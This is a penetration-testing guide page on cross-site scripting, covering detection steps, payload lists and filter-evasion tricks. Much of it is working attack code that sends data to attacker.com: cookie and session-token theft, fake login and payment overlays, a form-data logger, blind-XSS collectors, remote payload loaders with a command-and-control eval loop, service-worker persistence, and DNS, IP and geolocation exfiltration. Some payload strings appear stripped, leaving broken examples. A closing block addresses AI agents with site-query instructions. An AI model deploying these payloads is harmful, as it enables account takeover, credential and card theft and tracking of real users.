> For the complete documentation index, see [llms.txt](https://reaper.gitbook.io/my-penetration-test-guide/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://reaper.gitbook.io/my-penetration-test-guide/web-based-attacks/input-validation-testing/cross-site-scripting-xss.md). # Cross-site scripting (XSS) {% hint style="warning" %} Before you start, it is very recommended to have basics of **HTML/DOM structure and browser JavaScript**, **how user input is reflected or stored**, and **output encoding**. This part may seem long, and its sections are built to be sequentially starting from the beginner level up to some advanced stuff, feel free to navigate to whatever topic you want. hack fun :) {% endhint %} *** ## Understanding Cross-Site Scripting ### What is XSS? Cross-Site Scripting (XSS) exploits the way web applications handle user input by injecting malicious client-side scripts into web pages viewed by other users. When applications fail to properly validate, sanitize, or encode user input, attackers can manipulate the intended page structure to execute arbitrary JavaScript code. #### Vulnerable Code Example ```php // PHP vulnerable code $search = $_GET['search']; echo "

Search results for: " . $search . "

"; ``` **Normal Request:** * URL: `GET /search.php?search=products` * Output: `

Search results for: products

` **Malicious Request:** * URL: `GET /search.php?search=` * Output: `

Search results for:

` ### How XSS Works XSS attacks exploit the trust a user has for a particular site. The malicious script executes in the victim's browser with the same privileges as legitimate scripts from the trusted domain, allowing access to: * **Session Cookies** - Steal authentication tokens * **DOM Content** - Access and modify page content * **User Input** - Capture form data and keystrokes * **Browser APIs** - Access camera, microphone, location * **Cross-Origin Requests** - Make requests to other domains ### Common Vulnerable Input Points #### GET Parameters * URL query string parameters * Path parameters in RESTful APIs * Fragment identifiers (#hash) #### POST Parameters * Form input fields (text, textarea, hidden) * File upload parameters * JSON request bodies * XML data elements #### HTTP Headers * User-Agent strings * Referer headers * X-Forwarded-For headers * Custom application headers * Accept-Language headers #### Cookies * Session identifiers * User preference cookies * Tracking cookies * Authentication tokens #### WebSocket Messages * Real-time chat messages * Live notifications * Dynamic content updates *** ## XSS Detection Methodology Detection involves systematically identifying input points where user-supplied data influences HTML output and determining if proper input validation and output encoding are implemented. ### Manual Detection Techniques #### Basic Syntax Testing **HTML Tag Testing:** ```bash # Basic HTML tag injection curl "https:///search.php?q=" curl "https:///search.php?q=" curl "https:///search.php?q=" curl "https:///search.php?q=" # Script with different content curl "https:///search.php?q=" curl "https:///search.php?q=" ``` **Event Handler Testing:** ```bash # Mouse events curl "https:///search.php?q=

" curl "https:///search.php?q=

test

" curl "https:///search.php?q=click" # Load events curl "https:///search.php?q=" curl "https:///search.php?q=

Hacked

" curl "https:///profile.php?bio=" # HTML attribute injection curl "https:///profile.php?name=user\" onmouseover=\"alert(1)" curl "https:///profile.php?color=red\" onclick=\"alert(1)" ``` **JavaScript Context Testing:** ```bash # JavaScript string context curl "https:///search.php?q=test'; alert(1); //" curl "https:///search.php?q=test\"; alert(1); //" # JavaScript variable context curl "https:///profile.php?name='; alert(1); var dummy='" curl "https:///profile.php?name=\"; alert(1); var dummy=\"" ``` **URL Context Testing:** ```bash # href attribute injection curl "https:///profile.php?website=javascript:alert(1)" curl "https:///profile.php?url=data:text/html," # src attribute injection curl "https:///profile.php?avatar=javascript:alert(1)" ``` #### Response Analysis Techniques **Content Analysis:** ```bash # Compare response sizes for different inputs normal_size=$(curl -s "https:///search.php?q=normal" | wc -c) payload_size=$(curl -s "https:///search.php?q=" | wc -c) echo "Normal response size: $normal_size" echo "Payload response size: $payload_size" # Check if payload appears in source curl -s "https:///search.php?q=" | grep "" \ https:///register.php # Login and view profile curl -X POST -d "username=testuser&password=pass123" \ https:///login.php -c cookies.txt curl -b cookies.txt https:///profile.php?user=testuser ``` **Comment Systems:** ```bash # Submit comment with payload curl -X POST -d "comment=Great post! &author=TestUser&email=test@test.com" \ https:///submit_comment.php # View comments page curl https:///comments.php | grep -i script ``` **Forum Posts:** ```bash # Create forum post with XSS curl -X POST -b session_cookie \ -d "title=Test Post&content=Check this out:

&category=general" \ https:///forum/new_post.php # View forum thread curl https:///forum/view_thread.php?id=1 ``` #### Message Boards and Chat Systems **Private Messages:** ```bash # Send private message with payload curl -X POST -b session_cookie \ -d "recipient=admin&subject=Important&message=

" # Test if query parameters are reflected in error messages curl "https:///nonexistent?error=" ``` **Search Result Messages:** ```bash # Test search result messages curl "https:///search.php?q=" curl "https:///search.php?q=

" # Test advanced search forms curl -X POST -d "query=&type=advanced" https:///search.php ``` ### Exploitation Techniques #### URL-Based Attack Vectors **Direct Link Attacks:** ```bash # Create malicious URLs for distribution malicious_url="https:///search.php?q=" # URL encode for better delivery encoded_url="https:///search.php?q=%3Cscript%3Ewindow.location%3D%27http%3A//attacker.com/phish.php%3Fcookie%3D%27%2Bdocument.cookie%3C/script%3E" # Test the malicious URL curl "$encoded_url" ``` **Shortened URL Attacks:** * Use URL shorteners to hide malicious payload * Create bit.ly, tinyurl, or custom shortener links #### Social Engineering Delivery **Email-Based Delivery:** ```html

Dear User,

Please click here to view your search results.

``` **QR Code Attacks:** ```bash # Generate QR code containing malicious URL qr_payload="https:///search.php?q=" # Use online QR generators or qrencode tool ``` #### Form-Based Reflection Attacks **Contact Form Exploitation:** ```bash # Exploit contact forms that show "thank you" messages curl -X POST \ -d "name=" \ -d "email=test@test.com" \ -d "message=Hello" \ https:///contact.php # Newsletter subscription reflection curl -X POST \ -d "email=test@test.com" \ https:///subscribe.php ``` *** ## DOM-based XSS DOM-based XSS occurs when the vulnerability exists in client-side code rather than server-side code. The malicious script modifies the DOM environment in the victim's browser, and the server never sees the malicious payload. ### Source and Sink Analysis #### Identifying DOM Sources **URL Fragment Sources:** * `location.hash` * `location.search` * `location.pathname` * `window.location.href` * `document.URL` * `document.documentURI` * `document.baseURI` **Testing URL Fragment Injection:** ```bash # Test hash-based DOM XSS curl "https:///page.html#" curl "https:///spa.html#/profile/" # Test with encoded payloads curl "https:///page.html#%3Cscript%3Ealert(1)%3C/script%3E" ``` **Message Event Sources:** ```javascript // Test postMessage vulnerabilities window.addEventListener('message', function(event) { // Vulnerable: directly using event.data document.getElementById('content').innerHTML = event.data; }); ``` #### Identifying DOM Sinks **Dangerous Sink Functions:** * `eval()` * `setTimeout()` * `setInterval()` * `Function()` * `document.write()` * `document.writeln()` * `innerHTML` * `outerHTML` * `insertAdjacentHTML()` **HTML Content Sinks:** ```bash # Test innerHTML sink curl "https:///page.html#name=

" # Test document.write sink curl "https:///page.html#content=" ``` ### Client-Side Template Injection #### AngularJS Template Injection ```bash # AngularJS expression injection curl "https:///angular-app.html#name={{constructor.constructor('alert(1)')()}}" curl "https:///angular-app.html#search={{7*7}}" # AngularJS 1.6+ bypass curl "https:///angular-app.html#name={{constructor.constructor('alert(1)')()}}" ``` #### Vue.js Template Injection ```bash # Vue.js expression injection curl "https:///vue-app.html#name={{constructor.constructor('alert(1)')()}}" curl "https:///vue-app.html#data={{this.constructor.constructor('alert(1)')()}}" ``` ### Advanced DOM Exploitation #### JavaScript Framework Exploitation **React XSS Vectors:** ```bash # Test React dangerouslySetInnerHTML curl "https:///react-app.html#content=

" # React href injection curl "https:///react-app.html#link=javascript:alert('React href XSS')" ``` **jQuery Sink Exploitation:** ```bash # jQuery html() sink curl "https:///jquery-app.html#content=" # jQuery append() sink curl "https:///jquery-app.html#data=

" ``` #### Browser API Exploitation **LocalStorage/SessionStorage Injection:** ```bash # Test storage-based DOM XSS curl "https:///app.html#action=store&key=user&value=" # Test if stored data is later used unsafely curl "https:///app.html#action=load&key=user" ``` **WebSocket Message Injection:** ```javascript // Test WebSocket message handling var ws = new WebSocket('wss://target/websocket'); ws.send('{"type":"message","content":""}'); ``` *** ## XSS Payload Arsenal ### Basic Payloads #### Alert Box Payloads * `` * `` * `` * `` * `

` * `

` * `` * `` #### Event Handler Payloads **Mouse Events:** * `

Hover me

` * `Click me` * `

Press me

` **Focus Events:** * `` * `

`
* `<keygen onfocus=alert('XSS') autofocus>`

**Load Events:**

* `<iframe onload=alert('XSS')>`
* `<object onload=alert('XSS')>`
* `<embed onload=alert('XSS')>`

**Error Events:**

* `<video onerror=alert('XSS')><source>`
* `<audio onerror=alert('XSS')><source>`
* `<track onerror=alert('XSS')>`

### Context-Specific Payloads

#### HTML Context Payloads

* `<script>alert('HTML Context')</script>`
* `<img src=x onerror=alert('HTML Context')>`
* `<svg onload=alert('HTML Context')>`
* `<details open ontoggle=alert('HTML5 XSS')>`
* `<marquee onstart=alert('HTML5 XSS')>`
* `<meter onclick=alert('HTML5 XSS')>`

#### Attribute Context Payloads

* `" onmouseover="alert('Attribute XSS')" "`
* `' onmouseover='alert('Attribute XSS')' '`
* `"/> <script>alert('Attribute XSS')</script> <div a="`
* `javascript:alert('href XSS')`
* `data:text/html,<script>alert('data URI XSS')</script>`
* `vbscript:MsgBox("VBScript XSS")`

#### JavaScript Context Payloads

* `'; alert('JS String XSS'); //`
* `"; alert('JS String XSS'); //`
* `'; alert('JS String XSS'); var dummy='`
* `'; alert('JS Variable XSS'); var x='`
* `"; alert('JS Variable XSS'); var x="`
* `'); alert('JS Function XSS'); foo('`
* `"); alert('JS Function XSS'); foo("`

#### CSS Context Payloads

* `</style><script>alert('CSS XSS')</script><style>`
* `expression(alert('CSS Expression XSS'))`
* `behavior:url(javascript:alert('CSS Behavior XSS'))`
* `</style><svg onload=alert('CSS SVG XSS')><style>`

### Advanced Payloads

#### Cookie Stealing Payloads

```html

<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>

<script>
fetch('http://attacker.com/steal.php', {
  method: 'POST',
  body: 'cookie=' + document.cookie + '&url=' + window.location.href
});
</script>

<script>
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://attacker.com/steal.php', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send('cookie=' + encodeURIComponent(document.cookie));
</script>
```

#### Session Hijacking Payloads

```html

<script>
var sessionToken = localStorage.getItem('sessionToken') || 
                   sessionStorage.getItem('sessionToken') ||
                   document.cookie.match(/session=([^;]*)/)?.[1];
if (sessionToken) {
    new Image().src = 'http://attacker.com/session.php?token=' + sessionToken;
}
</script>

<script>
var jwt = localStorage.getItem('jwt') || 
          sessionStorage.getItem('jwt') ||
          document.cookie.match(/jwt=([^;]*)/)?.[1];
if (jwt) {
    fetch('http://attacker.com/jwt.php', {
        method: 'POST',
        body: JSON.stringify({token: jwt, url: location.href}),
        headers: {'Content-Type': 'application/json'}
    });
}
</script>
```

#### Credential Harvesting Payloads

```html

<script>
document.body.innerHTML += `
<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.8);z-index:9999;">
    <div style="position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);background:white;padding:20px;border-radius:5px;">
        <h3>Session Expired - Please Login Again</h3>
        <form id="fakeLogin" action="http://attacker.com/harvest.php" method="post">
            <input type="text" name="username" placeholder="Username" required><br><br>
            <input type="password" name="password" placeholder="Password" required><br><br>
            <input type="submit" value="Login">
        </form>
    </div>
</div>`;
</script>

<script>
if (window.location.href.includes('checkout') || window.location.href.includes('payment')) {
    document.body.innerHTML += `
    <div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999;">
        <h2>Payment Verification Required</h2>
        <form action="http://attacker.com/cc.php" method="post">
            <input type="text" name="cardnumber" placeholder="Card Number" required><br>
            <input type="text" name="expiry" placeholder="MM/YY" required><br>
            <input type="text" name="cvv" placeholder="CVV" required><br>
            <input type="submit" value="Verify Payment">
        </form>
    </div>`;
}
</script>
```

#### Keylogger Payloads

```html

<script>
var keys = '';
var target = '';

// Capture form submissions
document.addEventListener('submit', function(e) {
    var formData = new FormData(e.target);
    var data = {};
    for (var pair of formData.entries()) {
        data[pair[0]] = pair[1];
    }
    
    fetch('http://attacker.com/forms.php', {
        method: 'POST',
        body: JSON.stringify({
            formData: data,
            url: window.location.href,
            timestamp: new Date().toISOString()
        }),
        headers: {'Content-Type': 'application/json'}
    });
});
</script>
```

***

## Filter Evasion & Bypass Techniques

### Filter Analysis & Bypass Strategies

#### Case Manipulation Bypasses

* `<ScRiPt>alert('XSS')</ScRiPt>`
* `<SCRIPT>alert('XSS')</SCRIPT>`
* `<sCrIpT>alert('XSS')</sCrIpT>`
* `<img src=x OnErRoR=alert('XSS')>`
* `<div OnMoUsEoVeR=alert('XSS')>`
* `<body OnLoAd=alert('XSS')>`
* `<ImG sRc=x OnErRoR=alert('XSS')>`
* `<SvG oNlOaD=alert('XSS')>`
* `<DiV oNcLiCk=alert('XSS')>`

#### HTML Entity Encoding Bypasses

* `<script>alert('XSS')</script>`
* `<script>alert('XSS')</script>`
* `<script>alert('XSS')</script>`
* `<script>alert('XSS')</script>`
* `<img src=x onerror=alert('XSS')>`
* `<script>alert('XSS')</script>`

#### URL Encoding Bypasses

* `%3Cscript%3Ealert('XSS')%3C/script%3E`
* `%3Cimg%20src%3Dx%20onerror%3Dalert('XSS')%3E`
* `%253Cscript%253Ealert('XSS')%253C/script%253E`
* `%253Cimg%2520src%253Dx%2520onerror%253Dalert('XSS')%253E`
* `%3Cscript%3Ealert(%27XSS%27)%3C/script%3E`
* `%3Cimg%20src%3Dx%20onerror%3Dalert(%22XSS%22)%3E`

#### Unicode and UTF-8 Bypasses

* `<script>alert('\u0058\u0053\u0053')</script>`
* `<script>alert('\x58\x53\x53')</script>`
* `<script>alert('＜script＞')</script>`
* `<img src=x onerror=alert('🚨')>`
* `<scr\u0131pt>alert('XSS')</scr\u0131pt>`

#### Whitespace and Character Bypasses

* `<script >alert('XSS')</script>` (tab characters)
* `<img src=x onerror=alert('XSS')>` (tab characters)
* `<script\n>alert('XSS')</script>` (newline characters)
* `<script\r>alert('XSS')</script>` (carriage return)
* `<script\f>alert('XSS')</script>` (form feed)
* `<img src=x\t\n onerror=alert('XSS')>` (multiple whitespace types)

### WAF Circumvention Techniques

#### Comment-Based WAF Bypasses

* `<script>/**/alert('XSS')/**/</script>`
* `<img/**/src=x/**/onerror=alert('XSS')>`
* `<script>alert('XSS')</script>`
* `<img src=x onerror=alert('XSS')>`
* `<script>/*</script>`

#### Attribute Delimiter Bypasses

* `<img src=x onerror=alert('XSS')>` (no quotes)
* `<div onclick=alert('XSS')>` (no quotes)
* `<img src="x" onerror='alert("XSS")'>` (mixed quotes)
* `<div onclick='alert("XSS")'>` (mixed quotes)
* `<img src=`x `onerror=`alert('XSS')`>` (backticks)

#### Tag Structure Bypasses

* `<img/src=x/onerror=alert('XSS')/>` (self-closing tags)
* `<svg/onload=alert('XSS')/>`
* `<input/onfocus=alert('XSS')/autofocus>`
* `<img src=x onerror=alert('XSS'//` (malformed tags)
* `<script>alert('XSS')</script` (malformed)
* `<svg onload=alert('XSS')` (malformed)

#### Alternative Event Handlers

* `<details open ontoggle=alert('XSS')>`
* `<marquee onstart=alert('XSS')>XSS</marquee>`
* `<input oncut=alert('XSS')>`
* `<input onpaste=alert('XSS')>`
* `<input oninput=alert('XSS')>`
* `<video onplay=alert('XSS')><source>`
* `<audio oncanplay=alert('XSS')><source>`
* `<track onload=alert('XSS')>`
* `<form onsubmit=alert('XSS')>`
* `<input onchange=alert('XSS')>`
* `<select onchange=alert('XSS')><option>`

### Encoding & Obfuscation Methods

#### JavaScript Obfuscation

* `<script>alert('X'+'S'+'S')</script>` (string concatenation)
* `<script>alert('X'+'SS')</script>`
* `<script>alert(String.fromCharCode(88,83,83))</script>` (character code conversion)
* `<script>alert(String.fromCharCode(65,108,101,114,116)+'(1)')</script>`
* `<script>eval(atob('YWxlcnQoJ1hTUycpOw=='))</script>` (Base64 encoding)
* `<script>eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))</script>`
* `<script>eval('\x61\x6c\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29')</script>` (hex encoding)
* `<script>alert`XSS`</script>` (template literals)
* `<script>eval`alert\`XSS\``</script>`

#### Alternative JavaScript Execution

* `<img src=x onerror=setTimeout('alert("XSS")',1)>`
* `<img src=x onerror=setInterval('alert("XSS")',1)>`
* `<img src=x onerror=Function('alert("XSS")')()>`
* `<img src=x onerror=window['Function']('alert("XSS")')()>`
* `<img src=x onerror=new%20Function('alert("XSS")')()>`
* `<img src=x onerror=function*(){yield%20alert('XSS')}().next()>`

#### CSS-Based Bypasses

* `<div style="background:expression(alert('XSS'))">` (CSS expression - IE)
* `<style>@import"javascript:alert('XSS')";</style>` (CSS import with JavaScript)
* `<div style="behavior:url('javascript:alert(\"XSS\")')">` (CSS behavior)
* `<style>@import"data:text/css,*{color:red;background:url('javascript:alert(\"XSS\")')}"</style>`

***

## Blind XSS

Blind XSS occurs when the injected payload executes in a different context than where it was submitted, often in administrative panels, email systems, or log viewers where the attacker cannot directly observe the execution.

### Detection Techniques

#### Payload Deployment Strategies

**Contact Form Injection:**

```bash
# Submit blind XSS payload in contact forms
blind_payload='<script>var img=new Image();img.src="http://attacker.com/blind.php?cookie="+document.cookie+"&url="+encodeURIComponent(window.location.href)+"&referrer="+encodeURIComponent(document.referrer);</script>'

curl -X POST \
     -d "name=John Doe" \
     -d "email=john@test.com" \
     -d "subject=Important Question" \
     -d "message=$blind_payload" \
     https://<target>/contact.php
```

**User Registration Blind XSS:**

```bash
# Register with blind XSS in various fields
curl -X POST \
     -d "username=testuser" \
     -d "password=password123" \
     -d "email=test@test.com" \
     -d "first_name=$blind_payload" \
     -d "last_name=User" \
     -d "bio=Normal user bio" \
     https://<target>/register.php

# Try different fields
curl -X POST \
     -d "username=testuser2" \
     -d "password=password123" \
     -d "email=test2@test.com" \
     -d "company=$blind_payload" \
     -d "job_title=Developer" \
     https://<target>/register.php
```

**Support Ticket Systems:**

```bash
# Submit support tickets with blind XSS
curl -X POST -b session_cookie \
     -d "subject=Technical Issue" \
     -d "priority=high" \
     -d "description=I'm experiencing issues with $blind_payload" \
     -d "category=technical" \
     https://<target>/support/create_ticket.php
```

#### Advanced Blind XSS Payloads

**Information Gathering:**

```html
<script>
var data = {
    url: window.location.href,
    title: document.title,
    referrer: document.referrer,
    cookie: document.cookie,
    localStorage: JSON.stringify(localStorage),
    sessionStorage: JSON.stringify(sessionStorage),
    userAgent: navigator.userAgent,
    timestamp: new Date().toISOString(),
    dom: document.documentElement.outerHTML.substring(0, 5000)
};

// Send data
fetch('http://attacker.com/blind_collect.php', {
    method: 'POST',
    body: JSON.stringify(data),
    headers: {'Content-Type': 'application/json'}
}).catch(function() {
    // Fallback to image request
    new Image().src = 'http://attacker.com/blind_fallback.php?' + 
        'url=' + encodeURIComponent(data.url) + 
        '&cookie=' + encodeURIComponent(data.cookie);
});
</script>
```

**Administrative Panel Detection:**

```html
<script>
// Detect if running in admin context
var isAdmin = window.location.href.toLowerCase().includes('admin') ||
              document.title.toLowerCase().includes('admin') ||
              document.body.innerHTML.toLowerCase().includes('dashboard') ||
              document.cookie.toLowerCase().includes('admin');

if (isAdmin) {
    // Enhanced data collection for admin context
    var adminData = {
        url: window.location.href,
        title: document.title,
        cookie: document.cookie,
        forms: Array.from(document.forms).map(f => ({
            action: f.action,
            method: f.method,
            inputs: Array.from(f.elements).map(e => ({
                name: e.name,
                type: e.type,
                value: e.type !== 'password' ? e.value : '[HIDDEN]'
            }))
        })),
        links: Array.from(document.links).slice(0, 20).map(l => l.href)
    };
    
    fetch('http://attacker.com/admin_blind.php', {
        method: 'POST',
        body: JSON.stringify(adminData),
        headers: {'Content-Type': 'application/json'}
    });
}
</script>
```

### Exploitation Methods

#### Email System Exploitation

**Email Template Injection:**

```bash
# Newsletter subscription with XSS
curl -X POST \
     -d "email=victim@test.com" \
     -d "name=$blind_payload" \
     -d "preferences=all" \
     https://<target>/newsletter/subscribe.php

# Password reset form injection
curl -X POST \
     -d "email=admin@target.com<script>/* blind XSS */</script>" \
     https://<target>/forgot_password.php
```

**Email Header Injection:**

```bash
# User-Agent in email notifications
curl -H "User-Agent: Mozilla/5.0 $blind_payload" \
     -X POST \
     -d "email=test@test.com&message=Test message" \
     https://<target>/contact.php
```

#### Log File Exploitation

**Access Log Injection:**

```bash
# Inject XSS into access logs via User-Agent
curl -H "User-Agent: $blind_payload" \
     https://<target>/any_page.php

# Inject via Referer header
curl -H "Referer: http://evil.com/$blind_payload" \
     https://<target>/any_page.php

# Inject via custom headers
curl -H "X-Forwarded-For: 127.0.0.1 $blind_payload" \
     https://<target>/any_page.php
```

**Error Log Injection:**

```bash
# Trigger errors with XSS payloads
curl "https://<target>/nonexistent.php?error=$blind_payload"
curl -X POST \
     -d "malformed_data=$blind_payload" \
     https://<target>/process_form.php
```

#### Third-Party Integration Exploitation

**Analytics Dashboard Injection:**

```bash
# Inject into analytics via custom events
curl -X POST \
     -d "event=user_action" \
     -d "user_id=123" \
     -d "action=$blind_payload" \
     https://<target>/analytics/track.php
```

**CRM Integration Injection:**

```bash
# Inject into CRM via lead forms
curl -X POST \
     -d "lead_source=website" \
     -d "company=$blind_payload" \
     -d "contact_name=John Doe" \
     -d "phone=555-1234" \
     https://<target>/leads/submit.php
```

***

## Advanced XSS Techniques

### XSS Chaining

#### Multi-Stage Attack Chains

**Initial Access → Privilege Escalation:**

```html

<script>
// Check if user has admin privileges
fetch('/api/user/profile')
.then(response => response.json())
.then(data => {
    if (data.role === 'admin') {
        // Stage 2: Admin-specific exploitation
        loadAdminExploit();
    } else {
        // Stage 2: Regular user exploitation
        loadUserExploit();
    }
});

function loadAdminExploit() {
    // Load additional payload for admin users
    var script = document.createElement('script');
    script.src = 'http://attacker.com/admin_payload.js';
    document.head.appendChild(script);
}

function loadUserExploit() {
    // Load user-specific payload
    var script = document.createElement('script');
    script.src = 'http://attacker.com/user_payload.js';
    document.head.appendChild(script);
}
</script>
```

**XSS → CSRF → Data Exfiltration Chain:**

```html
<script>
// Stage 1: Steal CSRF token
var csrfToken = document.querySelector('meta[name="csrf-token"]').content;

// Stage 2: Perform CSRF attack to change admin email
fetch('/admin/change_email', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-CSRF-Token': csrfToken
    },
    body: 'new_email=attacker@evil.com&confirm_email=attacker@evil.com'
})
.then(response => {
    if (response.ok) {
        // Stage 3: Extract sensitive data
        return fetch('/admin/users/export');
    }
})
.then(response => response.text())
.then(data => {
    // Stage 4: Exfiltrate data
    fetch('http://attacker.com/exfil.php', {
        method: 'POST',
        body: data
    });
});
</script>
```

#### Progressive Payload Loading

**Conditional Payload Loading:**

```html
<script>
// Initial reconnaissance
var recon = {
    url: window.location.href,
    title: document.title,
    cookie: document.cookie,
    storage: {
        local: Object.keys(localStorage),
        session: Object.keys(sessionStorage)
    },
    forms: document.forms.length,
    scripts: document.scripts.length
};

// Send reconnaissance data
fetch('http://attacker.com/recon.php', {
    method: 'POST',
    body: JSON.stringify(recon),
    headers: {'Content-Type': 'application/json'}
})
.then(response => response.json())
.then(commands => {
    // Execute commands from C&C server
    commands.forEach(cmd => {
        if (cmd.type === 'eval') {
            eval(cmd.payload);
        } else if (cmd.type === 'load') {
            var script = document.createElement('script');
            script.src = cmd.url;
            document.head.appendChild(script);
        }
    });
});
</script>
```

### Post-Exploitation Techniques

#### Persistent Access Methods

**Service Worker Persistence:**

```html
<script>
if ('serviceWorker' in navigator) {
    // Register malicious service worker
    navigator.serviceWorker.register('data:application/javascript,' + 
        encodeURIComponent(`
            self.addEventListener('fetch', function(event) {
                // Inject XSS into all responses
                if (event.request.url.includes('${location.hostname}')) {
                    event.respondWith(
                        fetch(event.request).then(function(response) {
                            return response.text().then(function(text) {
                                var modifiedText = text.replace('</body>', 
                                    '<script src="http://attacker.com/persistent.js"></script></body>');
                                return new Response(modifiedText, {
                                    status: response.status,
                                    statusText: response.statusText,
                                    headers: response.headers
                                });
                            });
                        })
                    );
                }
            });
        `)
    );
}
</script>
```

**LocalStorage Persistence:**

```html
<script>
// Store persistent payload in localStorage
localStorage.setItem('analytics_config', JSON.stringify({
    enabled: true,
    endpoint: 'http://attacker.com/track.php',
    payload: 'fetch(endpoint + "?data=" + btoa(JSON.stringify({url:location.href,cookie:document.cookie})))'
}));

// Inject payload execution into existing scripts
var originalSetItem = localStorage.setItem;
localStorage.setItem = function(key, value) {
    if (key === 'analytics_config') {
        var config = JSON.parse(value);
        if (config.payload) {
            eval(config.payload);
        }
    }
    return originalSetItem.apply(this, arguments);
};
</script>
```

#### Advanced Data Exfiltration

**DNS Exfiltration:**

```html
<script>
function dnsExfiltrate(data) {
    // Convert data to hex and split into chunks
    var hex = btoa(data).replace(/[^a-zA-Z0-9]/g, '');
    var chunks = hex.match(/.{1,60}/g) || [];
    
    chunks.forEach(function(chunk, index) {
        var subdomain = chunk + '.' + index + '.exfil.attacker.com';
        var img = new Image();
        img.src = 'http://' + subdomain + '/pixel.gif';
    });
}

// Exfiltrate via DNS requests
dnsExfiltrate(JSON.stringify({
    url: location.href,
    cookies: document.cookie,
    forms: Array.from(document.forms).map(f => f.action)
}));
</script>
```

#### Browser Exploitation

**WebRTC IP Extraction:**

```html
<script>
function extractIPs() {
    var ips = [];
    var rtc = new RTCPeerConnection({iceServers:[]});
    
    rtc.createDataChannel('');
    rtc.createOffer().then(offer => rtc.setLocalDescription(offer));
    
    rtc.onicecandidate = function(ice) {
        if (ice.candidate) {
            var ip = /([0-9]{1,3}(\.[0-9]{1,3}){3})/.exec(ice.candidate.candidate);
            if (ip) {
                ips.push(ip[1]);
                // Send IP to attacker
                new Image().src = 'http://attacker.com/ip.php?ip=' + ip[1];
            }
        }
    };
}

extractIPs();
</script>
```

**Geolocation Access:**

```html
<script>
if (navigator.geolocation) {
    navigator.geolocation.getCurrentPosition(function(position) {
        var location = {
            latitude: position.coords.latitude,
            longitude: position.coords.longitude,
            accuracy: position.coords.accuracy,
            timestamp: position.timestamp
        };
        
        fetch('http://attacker.com/location.php', {
            method: 'POST',
            body: JSON.stringify(location),
            headers: {'Content-Type': 'application/json'}
        });
    });
}
</script>
```

---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://reaper.gitbook.io/my-penetration-test-guide/web-based-attacks/input-validation-testing/cross-site-scripting-xss.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.